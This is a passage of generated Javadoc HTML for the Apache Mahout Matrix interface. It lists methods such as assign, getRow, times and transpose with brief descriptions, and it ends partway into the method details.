<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#aggregateRows(org.apache.mahout.math.function.VectorFunction)">aggregateRows</A></B>(<A HREF="../../../../org/apache/mahout/math/function/VectorFunction.html" title="interface in org.apache.mahout.math.function">VectorFunction</A> f)</CODE>
<BR>
Collects the results of a function applied to each row of a matrix.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#asFormatString()">asFormatString</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#assign(double)">assign</A></B>(double value)</CODE>
<BR>
Assign the value to all elements of the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#assign(double[][])">assign</A></B>(double[][] values)</CODE>
<BR>
Assign the values to the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#assign(org.apache.mahout.math.function.DoubleFunction)">assign</A></B>(<A HREF="../../../../org/apache/mahout/math/function/DoubleFunction.html" title="interface in org.apache.mahout.math.function">DoubleFunction</A> function)</CODE>
<BR>
Apply the function to each element of the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#assign(org.apache.mahout.math.Matrix)">assign</A></B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> other)</CODE>
<BR>
Assign the other vector values to the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#assign(org.apache.mahout.math.Matrix, org.apache.mahout.math.function.DoubleDoubleFunction)">assign</A></B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> other,
<A HREF="../../../../org/apache/mahout/math/function/DoubleDoubleFunction.html" title="interface in org.apache.mahout.math.function">DoubleDoubleFunction</A> function)</CODE>
<BR>
Apply the function to each element of the receiver and the corresponding element of the other argument</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#assignColumn(int, org.apache.mahout.math.Vector)">assignColumn</A></B>(int column,
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> other)</CODE>
<BR>
Assign the other vector values to the column of the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#assignRow(int, org.apache.mahout.math.Vector)">assignRow</A></B>(int row,
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> other)</CODE>
<BR>
Assign the other vector values to the row of the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#clone()">clone</A></B>()</CODE>
<BR>
Return a copy of the recipient</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#columnSize()">columnSize</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#determinant()">determinant</A></B>()</CODE>
<BR>
Returns matrix determinator using Laplace theorem</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#divide(double)">divide</A></B>(double x)</CODE>
<BR>
Return a new matrix containing the values of the recipient divided by the argument</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#get(int, int)">get</A></B>(int row,
int column)</CODE>
<BR>
Return the value at the given indexes</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#get(java.lang.String, java.lang.String)">get</A></B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> columnLabel)</CODE>
<BR>
Return the value at the given labels</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#getColumn(int)">getColumn</A></B>(int column)</CODE>
<BR>
Return the column at the given index</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="http://download.oracle.com/javase/6/docs/api/java/util/Map.html?is-external=true" title="class or interface in java.util">Map</A><<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>,<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Integer.html?is-external=true" title="class or interface in java.lang">Integer</A>></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#getColumnLabelBindings()">getColumnLabelBindings</A></B>()</CODE>
<BR>
Return a map of the current column label bindings of the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> int[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#getNumNondefaultElements()">getNumNondefaultElements</A></B>()</CODE>
<BR>
Return the number of values in the recipient</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#getQuick(int, int)">getQuick</A></B>(int row,
int column)</CODE>
<BR>
Return the value at the given indexes, without checking bounds</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#getRow(int)">getRow</A></B>(int row)</CODE>
<BR>
Return the row at the given index</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="http://download.oracle.com/javase/6/docs/api/java/util/Map.html?is-external=true" title="class or interface in java.util">Map</A><<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>,<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Integer.html?is-external=true" title="class or interface in java.lang">Integer</A>></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#getRowLabelBindings()">getRowLabelBindings</A></B>()</CODE>
<BR>
Return a map of the current row label bindings of the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#like()">like</A></B>()</CODE>
<BR>
Return an empty matrix of the same underlying class as the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#like(int, int)">like</A></B>(int rows,
int columns)</CODE>
<BR>
Returns an empty matrix of the same underlying class as the receiver and of the specified size.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#minus(org.apache.mahout.math.Matrix)">minus</A></B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> x)</CODE>
<BR>
Return a new matrix containing the element by element difference of the recipient and the argument</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#plus(double)">plus</A></B>(double x)</CODE>
<BR>
Return a new matrix containing the sum of each value of the recipient and the argument</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#plus(org.apache.mahout.math.Matrix)">plus</A></B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> x)</CODE>
<BR>
Return a new matrix containing the element by element sum of the recipient and the argument</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#rowSize()">rowSize</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#set(int, double[])">set</A></B>(int row,
double[] data)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#set(int, int, double)">set</A></B>(int row,
int column,
double value)</CODE>
<BR>
Set the value at the given index</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#set(java.lang.String, double[])">set</A></B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
double[] rowData)</CODE>
<BR>
Sets the row values at the given row label</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#set(java.lang.String, int, double[])">set</A></B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
int row,
double[] rowData)</CODE>
<BR>
Sets the row values at the given row index and updates the row labels</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#set(java.lang.String, java.lang.String, double)">set</A></B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> columnLabel,
double value)</CODE>
<BR>
Set the value at the given index</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#set(java.lang.String, java.lang.String, int, int, double)">set</A></B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> rowLabel,
<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> columnLabel,
int row,
int column,
double value)</CODE>
<BR>
Set the value at the given index, updating the row and column label bindings</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#setColumnLabelBindings(java.util.Map)">setColumnLabelBindings</A></B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/util/Map.html?is-external=true" title="class or interface in java.util">Map</A><<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>,<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Integer.html?is-external=true" title="class or interface in java.lang">Integer</A>> bindings)</CODE>
<BR>
Sets a map of column label bindings in the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#setQuick(int, int, double)">setQuick</A></B>(int row,
int column,
double value)</CODE>
<BR>
Set the value at the given index, without checking bounds</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#setRowLabelBindings(java.util.Map)">setRowLabelBindings</A></B>(<A HREF="http://download.oracle.com/javase/6/docs/api/java/util/Map.html?is-external=true" title="class or interface in java.util">Map</A><<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>,<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Integer.html?is-external=true" title="class or interface in java.lang">Integer</A>> bindings)</CODE>
<BR>
Sets a map of row label bindings in the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> int[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#size()">size</A></B>()</CODE>
<BR>
Return the cardinality of the recipient (the maximum number of values)</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#times(double)">times</A></B>(double x)</CODE>
<BR>
Return a new matrix containing the product of each value of the recipient and the argument</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#times(org.apache.mahout.math.Matrix)">times</A></B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> x)</CODE>
<BR>
Return a new matrix containing the product of the recipient and the argument</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#transpose()">transpose</A></B>()</CODE>
<BR>
Return a new matrix that is the transpose of the receiver</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#viewColumn(int)">viewColumn</A></B>(int column)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#viewPart(int[], int[])">viewPart</A></B>(int[] offset,
int[] size)</CODE>
<BR>
Return a new matrix containing the subset of the recipient</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#viewPart(int, int, int, int)">viewPart</A></B>(int rowOffset,
int rowsRequested,
int columnOffset,
int columnsRequested)</CODE>
<BR>
Return a new matrix containing the subset of the recipient</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#viewRow(int)">viewRow</A></B>(int row)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#zSum()">zSum</A></B>()</CODE>
<BR>
Return the sum of all the elements of the receiver</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_org.apache.mahout.math.VectorIterable"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from interface org.apache.mahout.math.<A HREF="../../../../org/apache/mahout/math/VectorIterable.html" title="interface in org.apache.mahout.math">VectorIterable</A></B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="../../../../org/apache/mahout/math/VectorIterable.html#iterateAll()">iterateAll</A>, <A HREF="../../../../org/apache/mahout/math/VectorIterable.html#numCols()">numCols</A>, <A HREF="../../../../org/apache/mahout/math/VectorIterable.html#numRows()">numRows</A>, <A HREF="../../../../org/apache/mahout/math/VectorIterable.html#numSlices()">numSlices</A>, <A HREF="../../../../org/apache/mahout/math/VectorIterable.html#times(org.apache.mahout.math.Vector)">times</A>, <A HREF="../../../../org/apache/mahout/math/VectorIterable.html#timesSquared(org.apache.mahout.math.Vector)">timesSquared</A></CODE></TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Iterable"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from interface java.lang.<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Iterable.html?is-external=true" title="class or interface in java.lang">Iterable</A></B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Iterable.html?is-external=true#iterator()" title="class or interface in java.lang">iterator</A></CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="asFormatString()"><!-- --></A><H3>
asFormatString</H3>
<PRE>
<A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A> <B>asFormatString</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a formatted String suitable for output</DL>
</DD>
</DL>
<HR>
<A NAME="assign(double)"><!-- --></A><H3>
assign</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>assign</B>(double value)</PRE>
<DL>
<DD>Assign the value to all elements of the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>value</CODE> - a double value
<DT><B>Returns:</B><DD>the modified receiver</DL>
</DD>
</DL>
<HR>
<A NAME="assign(double[][])"><!-- --></A><H3>
assign</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>assign</B>(double[][] values)</PRE>
<DL>
<DD>Assign the values to the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>values</CODE> - a double[] of values
<DT><B>Returns:</B><DD>the modified receiver
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the cardinalities differ</DL>
</DD>
</DL>
<HR>
<A NAME="assign(org.apache.mahout.math.Matrix)"><!-- --></A><H3>
assign</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>assign</B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> other)</PRE>
<DL>
<DD>Assign the other vector values to the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>other</CODE> - a Matrix
<DT><B>Returns:</B><DD>the modified receiver
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the cardinalities differ</DL>
</DD>
</DL>
<HR>
<A NAME="assign(org.apache.mahout.math.function.DoubleFunction)"><!-- --></A><H3>
assign</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>assign</B>(<A HREF="../../../../org/apache/mahout/math/function/DoubleFunction.html" title="interface in org.apache.mahout.math.function">DoubleFunction</A> function)</PRE>
<DL>
<DD>Apply the function to each element of the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>function</CODE> - a DoubleFunction to apply
<DT><B>Returns:</B><DD>the modified receiver</DL>
</DD>
</DL>
<HR>
<A NAME="assign(org.apache.mahout.math.Matrix, org.apache.mahout.math.function.DoubleDoubleFunction)"><!-- --></A><H3>
assign</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>assign</B>(<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> other,
<A HREF="../../../../org/apache/mahout/math/function/DoubleDoubleFunction.html" title="interface in org.apache.mahout.math.function">DoubleDoubleFunction</A> function)</PRE>
<DL>
<DD>Apply the function to each element of the receiver and the corresponding element of the other argument
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>other</CODE> - a Matrix containing the second arguments to the function<DD><CODE>function</CODE> - a DoubleDoubleFunction to apply
<DT><B>Returns:</B><DD>the modified receiver
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the cardinalities differ</DL>
</DD>
</DL>
<HR>
<A NAME="assignColumn(int, org.apache.mahout.math.Vector)"><!-- --></A><H3>
assignColumn</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>assignColumn</B>(int column,
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> other)</PRE>
<DL>
<DD>Assign the other vector values to the column of the receiver
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>column</CODE> - the int row to assign<DD><CODE>other</CODE> - a Vector
<DT><B>Returns:</B><DD>the modified receiver
<DT><B>Throws:</B>
<DD><CODE><A HREF="../../../../org/apache/mahout/math/CardinalityException.html" title="class in org.apache.mahout.math">CardinalityException</A></CODE> - if the cardinalities differ</DL>
</DD>
</DL>
<HR>
<A NAME="assignRow(int, org.apache.mahout.math.Vector)"><!-- --></A><H3>
assignRow</H3>
<PRE>
<A HREF="../../../../org/apache/mahout/math/Matrix.html" title="interface in org.apache.mahout.math">Matrix</A> <B>assignRow</B>(int row,
<A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A> other)</PRE>
<DL>
